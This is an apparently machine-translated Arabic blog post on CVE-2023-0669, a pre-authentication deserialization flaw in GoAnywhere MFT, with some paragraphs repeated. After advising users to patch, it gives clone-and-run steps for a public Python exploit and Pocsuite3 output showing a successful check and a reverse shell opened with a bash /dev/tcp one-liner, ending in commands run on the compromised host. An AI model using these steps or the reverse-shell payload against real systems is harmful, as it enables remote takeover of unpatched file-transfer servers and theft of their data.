
GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet ثغرات إلغاء التسلسل Python RCE PoC(إثبات المفهوم)
CVE-2023-0669 GoAnywhere MFT إلغاء تسلسل - مدونة Je Yiuwai
CVE-2023-0669 هي ثغرة في إلغاء تسلسل GoAnywhere MFT، تنشأ عند إلغاء تسلسل كائن يتحكم فيه المهاجم، مما يؤدي إلى وجود ثغرة حقن أوامر قبل المصادقة في License Response Servlet. يمكن للمهاجم استغلال هذه الثغرة لتنفيذ أكواد عشوائية على النظام المتأثر، مما يؤدي إلى السيطرة الكاملة على النظام. تؤثر الثغرة على الإصدارات السابقة للإصدار 7.1.2، ولا تشمل 7.1.2.
CVE-2023-0669 هي ثغرة إلغاء تسلسل في GoAnywhere MFT توجد في License Response Servlet بسبب ثغرة حقن أوامر قبل المصادقة تسمح للمهاجم بتنفيذ أكواد عشوائية على النظام المتأثر عن طريق إلغاء تسلسل كائن يتحكم فيه المهاجم. تؤثر الثغرة على الإصدارات السابقة للإصدار 7.1.2.
تشكل هذه الثغرة تهديدًا خطيرًا لأمان برنامج نقل الملفات على مستوى المؤسسات GoAnywhere MFT، حيث يمكن للمهاجم استغلالها لسرقة البيانات الحساسة، أو التلاعب بالبيانات، أو تعطيل النظام. لذلك، يجب على المستخدمين اتخاذ إجراءات فورية لحماية أمان أنظمتهم.
يشكل الثغرة تهديدًا خطيرًا لأمان برنامج نقل الملفات على مستوى المؤسسات GoAnywhere MFT، حيث يمكن للمهاجم استغلالها لسرقة البيانات الحساسة، والتلاعب بالبيانات، واختراق الأنظمة. لذلك، يجب على المستخدمين اتخاذ إجراءات فورية لحماية أنظمتهم.
تم إصدار إعلان أمان رسمي، وتم توفير طرق فحص أولية. يمكن للمستخدمين التحقق مما إذا كانت أنظمتهم متأثرة بالثغرة من خلال البحث عن سلاسل محددة في سجل userdata/logs. إذا تعذر تطبيق التصحيحات، يُنصح باتخاذ إجراءات أمان أخرى لحماية النظام.
تم إصدار الإعلان الأمني الرسمي، وتم توفير طرق الفحص الأولية. يمكن للمستخدمين التحقق مما إذا كانت أنظمتهم متأثرة بالثغرة من خلال البحث عن سلاسل محددة في سجل userdata/logs. إذا تعذر تطبيق التصحيحات، يُنصح باتخاذ إجراءات أمان أخرى لحماية النظام.
باختصار، CVE-2023-0669 هي ثغرة إلغاء تسلسل تتطلب اهتمام المستخدمين. يجب على المستخدمين التحديث إلى أحدث إصدار فورًا والتحقق مما إذا كانت أنظمتهم متأثرة بالثغرة. بالإضافة إلى ذلك، يُنصح بتعزيز إدارة أمان البرامج على مستوى المؤسسات مثل GoAnywhere MFT واتخاذ إجراءات أمان متعددة الطبقات لحماية أنظمتهم.
باختصار، CVE-2023-0669 هي ثغرة إلغاء تسلسل تتطلب اهتمام المستخدمين. يحتاج المستخدمون إلى التحديث إلى أحدث إصدار فورًا والتحقق مما إذا كانت أنظمتهم متأثرة بالثغرة. بالإضافة إلى ذلك، يُنصح بتعزيز إدارة أمان البرامج على مستوى المؤسسات مثل GoAnywhere MFT واتخاذ إجراءات أمان متعددة الطبقات لحماية أنظمتهم.
هذا الاستغلال هو سكريبت بلغة Python يُستخدم لاستغلال الثغرة CVE-2023-0669 في GoAnywhere MFT الإصدار 6.7.9594 والإصدارات الأقدم.
توجد هذه الثغرة بسبب مشكلة أمان في معالجة طلبات Bundle المشفرة في GoAnywhere MFT. يمكن للمهاجم إرسال طلب مصمم خصيصًا لتنفيذ أكواد عشوائية على الخادم الهدف.
git clone https://github.com/Avento/CVE-2023-0669.git
cd CVE-2023-0669
pip install requests cryptography
python CVE-2023-0669.py --host <عنوان IP الهدف>
This Exploit is a Python script used to exploit the vulnerability CVE-2023-0669 in GoAnywhere MFT v6.7.9594 and earlier versions.
This vulnerability exists because of a security issue in processing encrypted Bundle requests in GoAnywhere MFT. An attacker can send a specially crafted request to execute arbitrary code on the target server.
git clone https://github.com/Avento/CVE-2023-0669.git
cd CVE-2023-0669
pip install requests cryptography
python CVE-2023-0669.py --host <target IP>
$ python3 CVE-2023-0669.py --host 192.168.47.179:8000
Exploit Success ~
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > check
[11:10:53] [INFO] pocsusite got a total of 1 tasks
[11:10:53] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
[11:10:53] [+] Version : 7.0.3
[11:10:53] [INFO] Scan completed,ready to print
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
| target-url | poc-name | poc-id | component | version | status |
----------+---------+
| http://192.168.47.179:8000 | CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet إلغاء تسلسل | CVE-2023-0669 | GoAnywhere MFT | قبل 7.1.2، وليس بما في ذلك 7.1.2 | نجاح |
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
success : 1 / 1
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > shell
[11:11:55] [INFO] pocsusite got a total of 1 tasks
[11:11:55] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
/bin/bash -c bash$IFS-i$IFS>&$IFS/dev/tcp/192.168.47.1/6666<&1
[11:11:55] [*] listening on 0.0.0.0:6666
[11:11:56] [+] new connection established from 192.168.47.179
[11:11:56] [INFO] Scan completed,ready to print
[11:11:56] [INFO] connect back ip: 192.168.47.1 port: 6666
[11:11:56] [INFO] watting for shell connect to pocsuite
Now Connected: 192.168.47.179
SHELL (192.168.47.179) > id
bash: cannot set terminal process group (20029): Inappropriate ioctl for device
bash: no job control in this shell
ubuntu@ubuntu:~/HelpSystems/GoAnywhere$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
المؤلف: Je Yiuwai تم التحرير بواسطة xiaomi pad 6 pro